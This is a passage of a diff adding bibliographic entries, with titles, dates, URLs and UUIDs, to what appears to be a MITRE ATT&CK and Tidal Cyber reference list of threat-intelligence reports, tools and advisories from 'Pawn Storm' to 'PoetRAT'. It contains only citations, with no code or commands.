"3bc249cd-f29a-4a74-a179-a6860e43683f", + "value": "TrendMicro Pawn Storm Dec 2020" + }, + { + "description": "ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020.", + "meta": { + "date_accessed": "2020-12-21T00:00:00Z", + "date_published": "2020-12-17T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf" + ], + "source": "MITRE", + "title": "Pay2Key Ransomware – A New Campaign by Fox Kitten" + }, + "related": [], + "uuid": "6e09bc1a-8a5d-4512-9176-40eed91af358", + "value": "ClearSky Pay2Kitten December 2020" + }, + { + "description": "Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.", + "meta": { + "date_accessed": "2017-03-02T00:00:00Z", + "date_published": "2000-07-24T00:00:00Z", + "refs": [ + "https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/" + ], + "source": "MITRE", + "title": "PayPal alert! Beware the 'PaypaI' scam" + }, + "related": [], + "uuid": "bcea7897-6cb2-467d-ad3b-ffd20badf19f", + "value": "PaypalScam" + }, + { + "description": "LOLBAS. (2018, May 25). Pcalua.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/" + ], + "source": "Tidal Cyber", + "title": "Pcalua.exe" + }, + "related": [], + "uuid": "958064d4-7f9f-46a9-b475-93d6587ed770", + "value": "Pcalua.exe - LOLBAS Project" + }, + { + "description": "Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.", + "meta": { + "date_accessed": "2020-09-17T00:00:00Z", + "date_published": "2019-07-30T00:00:00Z", + "refs": [ + "https://github.com/bontchev/pcodedmp" + ], + "source": "MITRE", + "title": "pcodedmp.py - A VBA p-code disassembler" + }, + "related": [], + "uuid": "3057d857-6984-4247-918b-952b75ee152e", + "value": "pcodedmp Bontchev" + }, + { + "description": "LiveMirror. (2014, September 17). PcShare. Retrieved October 11, 2022.", + "meta": { + "date_accessed": "2022-10-11T00:00:00Z", + "date_published": "2014-09-17T00:00:00Z", + "refs": [ + "https://github.com/LiveMirror/pcshare" + ], + "source": "MITRE", + "title": "PcShare" + }, + "related": [], + "uuid": "f113559f-a6da-43bc-bc64-9ff7155b82bc", + "value": "GitHub PcShare 2014" + }, + { + "description": "LOLBAS. (2018, May 25). Pcwrun.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/" + ], + "source": "Tidal Cyber", + "title": "Pcwrun.exe" + }, + "related": [], + "uuid": "b5946ca4-1f1b-4cba-af2f-0b99d6fff8b0", + "value": "Pcwrun.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Pcwutl.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/" + ], + "source": "Tidal Cyber", + "title": "Pcwutl.dll" + }, + "related": [], + "uuid": "1050758d-20da-4c4a-83d3-40aeff3db9ca", + "value": "Pcwutl.dll - LOLBAS Project" + }, + { + "description": "Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved January 31, 2024.", + "meta": { + "date_accessed": "2024-01-31T00:00:00Z", + "date_published": "2023-09-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/" + ], + "source": "Tidal Cyber", + "title": "Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets" + }, + "related": [], + "uuid": "98a631f4-4b95-4159-b311-dee1216ec208", + "value": "Microsoft Peach Sandstorm September 14 2023" + }, + { + "description": "Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved September 18, 2023.", + "meta": { + "date_accessed": "2023-09-18T00:00:00Z", + "date_published": "2023-09-14T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/" + ], + "source": "MITRE", + "title": "Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets" + }, + "related": [], + "uuid": "84d026ed-b8f2-5bbb-865a-2d93aa4b2ef8", + "value": "Microsoft Peach Sandstorm 2023" + }, + { + "description": "Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.", + "meta": { + "date_accessed": "2021-11-19T00:00:00Z", + "date_published": "2021-10-06T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb" + ], + "source": "MITRE", + "title": "PEB structure (winternl.h)" + }, + "related": [], + "uuid": "e0ec4cf6-1e6a-41ab-8704-a66c5cc4d226", + "value": "Microsoft PEB 2021" + }, + { + "description": "InGuardians. (2022, January 5). Peirates GitHub. Retrieved February 8, 2022.", + "meta": { + "date_accessed": "2022-02-08T00:00:00Z", + "date_published": "2022-01-05T00:00:00Z", + "refs": [ + "https://github.com/inguardians/peirates" + ], + "source": "MITRE", + "title": "Peirates GitHub" + }, + "related": [], + "uuid": "a75cde8b-76e4-4dc3-b1d5-cf08479905e7", + "value": "Peirates GitHub" + }, + { + "description": "García, C. (2019, April 3). Pentesting Active Directory Forests. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2019-04-03T00:00:00Z", + "refs": [ + "https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019" + ], + "source": "MITRE", + "title": "Pentesting Active Directory Forests" + }, + "related": [], + "uuid": "3ca2e78e-751e-460b-9f3c-f851d054bce4", + "value": "Pentesting AD Forests" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, September 27). People's Republic of China-Linked Cyber Actors Hide in Router Firmware. Retrieved September 29, 2023.", + "meta": { + "date_accessed": "2023-09-29T00:00:00Z", + "date_published": "2023-09-27T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-270a" + ], + "source": "Tidal Cyber", + "title": "People's Republic of China-Linked Cyber Actors Hide in Router Firmware" + }, + "related": [], + "uuid": "309bfb48-76d1-4ae9-9c6a-30b54658133c", + "value": "U.S. CISA BlackTech September 27 2023" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, May 24). People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved May 25, 2023.", + "meta": { + "date_accessed": "2023-05-25T00:00:00Z", + "date_published": "2023-05-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a" + ], + "source": "Tidal Cyber", + "title": "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection" + }, + "related": [], + "uuid": "12320f38-ebbf-486a-a450-8a548c3722d6", + "value": "U.S. CISA Volt Typhoon May 24 2023" + }, + { + "description": "NSA et al. (2023, May 24). People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved July 27, 2023.", + "meta": { + "date_accessed": "2023-07-27T00:00:00Z", + "date_published": "2023-05-24T00:00:00Z", + "refs": [ + "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" + ], + "source": "MITRE", + "title": "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection" + }, + "related": [], + "uuid": "14872f08-e219-5c0d-a2d7-43a3ba348b4b", + "value": "Joint Cybersecurity Advisory Volt Typhoon June 2023" + }, + { + "description": "Microsoft. (2004, February 6). Perimeter Firewall Design. Retrieved April 25, 2016.", + "meta": { + "date_accessed": "2016-04-25T00:00:00Z", + "date_published": "2004-02-06T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc700828.aspx" + ], + "source": "MITRE", + "title": "Perimeter Firewall Design" + }, + "related": [], + "uuid": "bb149242-1916-400d-93b8-d0def161ed85", + "value": "TechNet Firewall Design" + }, + { + "description": "Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.", + "meta": { + "date_accessed": "2018-06-27T00:00:00Z", + "date_published": "2018-04-10T00:00:00Z", + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" + ], + "source": "MITRE", + "title": "Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe" + }, + "related": [], + "uuid": "8661b51c-ddb7-484f-919d-22079c39d1e4", + "value": "Oddvar Moe IFEO APR 2018" + }, + { + "description": "Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.", + "meta": { + "date_accessed": "2018-06-29T00:00:00Z", + "date_published": "2018-03-21T00:00:00Z", + "refs": [ + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/" + ], + "source": "MITRE", + "title": "Persistence using RunOnceEx - Hidden from Autoruns.exe" + }, + "related": [], + "uuid": "36d52213-8d9f-4642-892b-40460d5631d7", + "value": "Oddvar Moe RunOnceEx Mar 2018" + }, + { + "description": "Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.", + "meta": { + "date_accessed": "2021-04-22T00:00:00Z", + "date_published": "2018-10-17T00:00:00Z", + "refs": [ + "https://xorrior.com/persistent-credential-theft/" + ], + "source": "MITRE", + "title": "Persistent Credential Theft with Authorization Plugins" + }, + "related": [], + "uuid": "e397815d-34ea-4275-90d8-1b85e5b47369", + "value": "Xorrior Authorization Plugins" + }, + { + "description": "Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021.", + "meta": { + "date_accessed": "2021-04-14T00:00:00Z", + "date_published": "2020-08-06T00:00:00Z", + "refs": [ + "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" + ], + "source": "MITRE", + "title": "Persistent JXA" + }, + "related": [], + "uuid": "d9b6bb05-6ab4-4f5e-9ef0-f3e0cc97ce29", + "value": "SpecterOps JXA 2020" + }, + { + "description": "Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell for macOS. Retrieved January 11, 2021.", + "meta": { + "date_accessed": "2021-01-11T00:00:00Z", + "date_published": "2020-08-06T00:00:00Z", + "refs": [ + "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" + ], + "source": "MITRE", + "title": "Persistent JXA - A poor man's Powershell for macOS" + }, + "related": [], + "uuid": "2d66932e-1b73-4255-a9a8-ea8effb3a776", + "value": "PersistentJXA_leopitt" + }, + { + "description": "LOLBAS. (2018, May 25). Pester.bat. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/pester/" + ], + "source": "Tidal Cyber", + "title": "Pester.bat" + }, + "related": [], + "uuid": "93f281f6-6fcc-474a-b222-b303ea417a18", + "value": "Pester.bat - LOLBAS Project" + }, + { + "description": "Trend Micro. (2014, December 11). PE_URSNIF.A2. Retrieved June 5, 2019.", + "meta": { + "date_accessed": "2019-06-05T00:00:00Z", + "date_published": "2014-12-11T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_URSNIF.A2?_ga=2.131425807.1462021705.1559742358-1202584019.1549394279" + ], + "source": "MITRE", + "title": "PE_URSNIF.A2" + }, + "related": [], + "uuid": "71f5b9da-b882-4376-ac93-b4ce952d0271", + "value": "TrendMicro PE_URSNIF.A2" + }, + { + "description": "Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2012-10-10T00:00:00Z", + "refs": [ + "https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html" + ], + "source": "MITRE", + "title": "Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit" + }, + "related": [], + "uuid": "6149f9ed-9218-489b-b87c-8208de89be68", + "value": "Volatility Phalanx2" + }, + { + "description": "Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021.", + "meta": { + "date_accessed": "2021-12-22T00:00:00Z", + "date_published": "2020-05-06T00:00:00Z", + "refs": [ + "https://www.prevailion.com/phantom-in-the-command-shell-2/" + ], + "source": "MITRE", + "title": "Phantom in the Command Shell" + }, + "related": [], + "uuid": "533b8ae2-2fc3-4cf4-bcaa-5d8bfcba91c0", + "value": "Prevailion EvilNum May 2020" + }, + { + "description": "Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.", + "meta": { + "date_accessed": "2018-07-21T00:00:00Z", + "date_published": "2016-09-24T00:00:00Z", + "refs": [ + "https://github.com/ryhanson/phishery" + ], + "source": "MITRE", + "title": "phishery" + }, + "related": [], + "uuid": "7e643cf0-5df7-455d-add7-2342f36bdbcb", + "value": "ryhanson phishery SEPT 2016" + }, + { + "description": "Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.", + "meta": { + "date_accessed": "2020-10-23T00:00:00Z", + "date_published": "2016-09-24T00:00:00Z", + "refs": [ + "https://github.com/ryhanson/phishery" + ], + "source": "MITRE", + "title": "phishery" + }, + "related": [], + "uuid": "6da51561-a813-4802-aa84-1b3de1bc2e14", + "value": "GitHub Phishery" + }, + { + "description": "ANSSI. (2021, December 6). PHISHING CAMPAIGNS BY THE NOBELIUM INTRUSION SET. Retrieved April 13, 2022.", + "meta": { + "date_accessed": "2022-04-13T00:00:00Z", + "date_published": "2021-12-06T00:00:00Z", + "refs": [ + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf" + ], + "source": "MITRE", + "title": "PHISHING CAMPAIGNS BY THE NOBELIUM INTRUSION SET" + }, + "related": [], + "uuid": "96ee2b87-9727-4914-affe-d9dc5d58c955", + "value": "ANSSI Nobelium Phishing December 2021" + }, + { + "description": "Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.", + "meta": { + "date_accessed": "2018-12-17T00:00:00Z", + "date_published": "2015-01-21T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/" + ], + "source": "MITRE", + "title": "Phishing for Credentials: If you want it, just ask!" + }, + "related": [], + "uuid": "7fff81f0-2b99-4f4f-8eca-c6a54c4d8205", + "value": "Enigma Phishing for Credentials Jan 2015" + }, + { + "description": "KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022.", + "meta": { + "date_accessed": "2022-03-07T00:00:00Z", + "refs": [ + "https://www.boho.or.kr/krcert/publicationView.do?bulletin_writing_sequence=35936" + ], + "source": "MITRE", + "title": "Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi" + }, + "related": [], + "uuid": "8742ac96-a316-4264-9d3d-265784483f1a", + "value": "KISA Operation Muzabi" + }, + { + "description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2017-08-02T00:00:00Z", + "refs": [ + "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/" + ], + "source": "MITRE", + "title": "Phishing with OAuth and o365/Azure" + }, + "related": [], + "uuid": "ae139c14-05ec-4c75-861b-15d86b4913fc", + "value": "Staaldraad Phishing with OAuth 2017" + }, + { + "description": "Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2020-12-30T00:00:00Z", + "refs": [ + "https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection" + ], + "source": "MITRE", + "title": "Phobos Ransomware, Fast.exe" + }, + "related": [], + "uuid": "929dbb22-34a5-4377-95dd-9e240ecb343a", + "value": "phobos_virustotal" + }, + { + "description": "Brumaghin, E., Unterbrink, H. (2018, August 22). Picking Apart Remcos Botnet-In-A-Box. Retrieved November 6, 2018.", + "meta": { + "date_accessed": "2018-11-06T00:00:00Z", + "date_published": "2018-08-22T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html" + ], + "source": "MITRE", + "title": "Picking Apart Remcos Botnet-In-A-Box" + }, + "related": [], + "uuid": "c5cb2eff-ed48-47ff-bfd6-79152bf51430", + "value": "Talos Remcos Aug 2018" + }, + { + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "meta": { + "date_accessed": "2019-04-17T00:00:00Z", + "date_published": "2019-04-05T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + ], + "source": "MITRE", + "title": "Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware" + }, + "related": [], + "uuid": "e8a2bc6a-04e3-484e-af67-5f57656c7206", + "value": "FireEye FIN6 Apr 2019" + }, + { + "description": "Huseyin Can YUCEEL & Picus Labs. (2022, March 22). Retrieved March 31, 2023.", + "meta": { + "date_accessed": "2023-03-31T00:00:00Z", + "refs": [ + "https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use" + ], + "source": "MITRE", + "title": "Picus Labs Proc cump 2022" + }, + "related": [], + "uuid": "e8a50a79-6ca4-5c91-87ad-0b1ba9eca505", + "value": "Picus Labs Proc cump 2022" + }, + { + "description": "Lily Hay Newman. (n.d.). ‘Pig Butchering’ Scams Are Now a $3 Billion Threat. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "refs": [ + "https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/" + ], + "source": "MITRE", + "title": "‘Pig Butchering’ Scams Are Now a $3 Billion Threat" + }, + "related": [], + "uuid": "dc833e17-7105-5790-b30b-b4fed7fd2d2f", + "value": "wired-pig butchering" + }, + { + "description": "Jérôme Segura. (2023, December 15). PikaBot distributed via malicious search ads. Retrieved January 11, 2023.", + "meta": { + "date_accessed": "2023-01-11T00:00:00Z", + "date_published": "2023-12-15T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads" + ], + "source": "Tidal Cyber", + "title": "PikaBot distributed via malicious search ads" + }, + "related": [], + "uuid": "50b29ef4-7ade-4672-99b6-fdf367170a5b", + "value": "Malwarebytes Pikabot December 15 2023" + }, + { + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7’s Monkey Thief . Retrieved July 27, 2020.", + "meta": { + "date_accessed": "2020-07-27T00:00:00Z", + "date_published": "2020-06-22T00:00:00Z", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/" + ], + "source": "MITRE", + "title": "Pillowmint: FIN7’s Monkey Thief" + }, + "related": [], + "uuid": "31bf381d-a0fc-4a4f-8d39-832480891685", + "value": "Trustwave Pillowmint June 2020" + }, + { + "description": "Microsoft. (n.d.). Ping. Retrieved April 8, 2016.", + "meta": { + "date_accessed": "2016-04-08T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490968.aspx" + ], + "source": "MITRE", + "title": "Ping" + }, + "related": [], + "uuid": "5afc8ad5-f50d-464f-ba84-e347b3f3e994", + "value": "TechNet Ping" + }, + { + "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", + "meta": { + "date_accessed": "2019-04-05T00:00:00Z", + "date_published": "2018-12-01T00:00:00Z", + "refs": [ + "https://wunderwuzzi23.github.io/blog/passthecookie.html" + ], + "source": "MITRE", + "title": "Pivot to the Cloud using Pass the Cookie" + }, + "related": [], + "uuid": "dc67930f-5c7b-41be-97e9-d8f4a55e6019", + "value": "Pass The Cookie" + }, + { + "description": "LOLBAS. (2020, August 12). Pktmon.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-08-12T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/" + ], + "source": "Tidal Cyber", + "title": "Pktmon.exe" + }, + "related": [], + "uuid": "8f0ad4ed-869b-4332-b091-7551262cff29", + "value": "Pktmon.exe - LOLBAS Project" + }, + { + "description": "Osanda Malith Jayathissa. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.", + "meta": { + "date_accessed": "2018-01-26T00:00:00Z", + "date_published": "2017-03-24T00:00:00Z", + "refs": [ + "https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/" + ], + "source": "MITRE", + "title": "Places of Interest in Stealing NetNTLM Hashes" + }, + "related": [], + "uuid": "991f885e-b3f4-4f3f-b0f9-c9862f918f36", + "value": "Osanda Stealing NetNTLM Hashes" + }, + { + "description": "Kaplan, D, et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.", + "meta": { + "date_accessed": "2018-02-19T00:00:00Z", + "date_published": "2017-06-07T00:00:00Z", + "refs": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc" + ], + "source": "MITRE", + "title": "PLATINUM continues to evolve, find ways to maintain invisibility" + }, + "related": [], + "uuid": "e71c669e-50bc-4e91-8cee-7cbedab420d1", + "value": "Microsoft PLATINUM June 2017" + }, + { + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2016-04-29T00:00:00Z", + "refs": [ + "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "PLATINUM: Targeted attacks in South and Southeast Asia" + }, + "related": [], + "uuid": "d0ec5037-aa7f-48ee-8d37-ff8fb2c8c297", + "value": "Microsoft PLATINUM April 2016" + }, + { + "description": "Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.", + "meta": { + "date_accessed": "2017-11-16T00:00:00Z", + "date_published": "2017-03-30T00:00:00Z", + "refs": [ + "https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware" + ], + "source": "MITRE", + "title": "Playing Cat & Mouse: Introducing the Felismus Malware" + }, + "related": [], + "uuid": "23b94586-3856-4937-9b02-4fe184b7ba01", + "value": "Forcepoint Felismus Mar 2017" + }, + { + "description": "Symantec Threat Hunter Team. (2023, April 19). Play Ransomware Group Using New Custom Data-Gathering Tools. Retrieved August 10, 2023.", + "meta": { + "date_accessed": "2023-08-10T00:00:00Z", + "date_published": "2023-04-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy" + ], + "source": "Tidal Cyber", + "title": "Play Ransomware Group Using New Custom Data-Gathering Tools" + }, + "related": [], + "uuid": "a78613a5-ce17-4d11-8f2f-3e642cd7673c", + "value": "Symantec Play Ransomware April 19 2023" + }, + { + "description": "Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares. (2022, September 6). Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa. Retrieved August 10, 2023.", + "meta": { + "date_accessed": "2023-08-10T00:00:00Z", + "date_published": "2022-09-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html" + ], + "source": "Tidal Cyber", + "title": "Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa" + }, + "related": [], + "uuid": "2d2b527d-25b0-4b58-9ae6-c87060b64069", + "value": "Trend Micro Play Playbook September 06 2022" + }, + { + "description": "Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares. (2022, September 6). Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa. Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "date_published": "2022-09-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.trendmicro.com/es_es/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html" + ], + "source": "Tidal Cyber", + "title": "Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa" + }, + "related": [], + "uuid": "ed02529c-920d-4a92-8e86-be1ed7083991", + "value": "Trend Micro Play Ransomware September 06 2022" + }, + { + "description": "Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.", + "meta": { + "date_accessed": "2020-05-06T00:00:00Z", + "date_published": "2018-06-08T00:00:00Z", + "refs": [ + "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" + ], + "source": "MITRE", + "title": "PLEAD Downloader Used by BlackTech" + }, + "related": [], + "uuid": "871f4af2-ed99-4256-a74d-b8c0816a82ab", + "value": "JPCert PLEAD Downloader June 2018" + }, + { + "description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "date_published": "2014-05-23T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/" + ], + "source": "MITRE", + "title": "PLEAD Targeted Attacks Against Taiwanese Government Agencies" + }, + "related": [], + "uuid": "9a052eba-1708-44c9-a20f-8b4ef208fa14", + "value": "Trend Micro PLEAD RTLO" + }, + { + "description": "FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2019-11-26T00:00:00Z", + "refs": [ + "https://fileinfo.com/extension/plist" + ], + "source": "MITRE", + "title": ".PLIST File Extension" + }, + "related": [], + "uuid": "24331b9d-68af-4db2-887f-3a984b6c5783", + "value": "fileinfo plist file description" + }, + { + "description": "LOLBAS. (2020, December 25). Pnputil.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-12-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pnputil/" + ], + "source": "Tidal Cyber", + "title": "Pnputil.exe" + }, + "related": [], + "uuid": "21d0419a-5454-4808-b7e6-2b1b9de08ed6", + "value": "Pnputil.exe - LOLBAS Project" + }, + { + "description": "Nischay Hegde and Siddartha Malladi. (2023, July 12). PoC Exploit: Fake Proof of Concept with Backdoor Malware. Retrieved September 28, 2023.", + "meta": { + "date_accessed": "2023-09-28T00:00:00Z", + "date_published": "2023-07-12T00:00:00Z", + "refs": [ + "https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware" + ], + "source": "MITRE", + "title": "PoC Exploit: Fake Proof of Concept with Backdoor Malware" + }, + "related": [], + "uuid": "edc18649-2fcf-5fb3-a717-db4bb28ca25f", + "value": "uptycs Fake POC linux malware 2023" + }, + { + "description": "Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.", + "meta": { + "date_accessed": "2018-01-31T00:00:00Z", + "date_published": "2017-09-14T00:00:00Z", + "refs": [ + "https://github.com/mattifestation/PoCSubjectInterfacePackage" + ], + "source": "MITRE", + "title": "PoCSubjectInterfacePackage" + }, + "related": [], + "uuid": "1a9bc729-532b-47ab-89ba-90b0ff41f8aa", + "value": "GitHub SIP POC Sept 2017" + }, + { + "description": "kubenetes. (n.d.). Pod v1 core. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core" + ], + "source": "MITRE", + "title": "Pod v1 core" + }, + "related": [], + "uuid": "8a7a4a51-e16d-447e-8f1e-c02d6dae3e26", + "value": "Kube Pod" + }, + { + "description": "Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021.", + "meta": { + "date_accessed": "2021-04-09T00:00:00Z", + "date_published": "2020-10-06T00:00:00Z", + "refs": [ + 